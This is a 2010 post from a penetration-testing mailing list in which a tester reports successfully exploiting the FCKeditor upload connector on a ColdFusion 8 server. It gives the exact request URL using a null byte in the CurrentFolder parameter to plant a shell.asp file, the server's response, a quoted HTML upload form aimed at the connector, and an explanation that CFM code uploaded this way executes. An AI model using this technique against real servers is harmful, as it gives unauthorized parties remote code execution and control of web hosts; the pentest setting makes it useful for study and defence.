Penetration Testing mailing list archives
Re: ColdFusion 8 w/ FCKEditor
From: The Dead <th3d34d () gmail com>
Date: Wed, 30 Jun 2010 21:54:30 -0300
Hello George, The trick worked! Thanks! The request was: http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?CurrentForder=/shell.asp%00 I got this response from server: <script type="text/javascript"> window.parent.OnUploadCompleted( 0, "/userfiles/file/teste.asp�/teste.txt", "teste.txt", "0" ); </script> So, I could access /userfiles/file/teste.asp and got the asp script executed. Thanks to all! On Wed, Jun 30, 2010 at 8:42 PM, George A. Theall <theall () tifaware com> wrote:
On Wed, Jun 30, 2010 at 05:59:04PM -0300, The Dead wrote:I got two servers with this condition. In one of the server, CFM files were allowed to be uploaded as ASP and others. It was simple to upload to the server using a HTML based form as: <html> <form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?" method="post" enctype="multipart/form-data"> <input type="file" name="NewFile"></input> <input type="submit"> </form> In another server, CFM extensions and others like ASP, PHP are not allowed to be uploaded. So, I?m trying something to solve this case.The trick is to pass the name of the destination file through the 'CurrentFolder' parameter and follow it by a NULL byte, use an innocuous file name for 'NewFile', and include CFM code as the contents. I suppose you might be able to substitute ASP code or something else, but you _know_ the server supports Coldfusion scripts. George -- theall () tifaware com ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- Re: ColdFusion 8 w/ FCKEditor The Dead (Jul 01)
- Re: ColdFusion 8 w/ FCKEditor The Dead (Jul 01)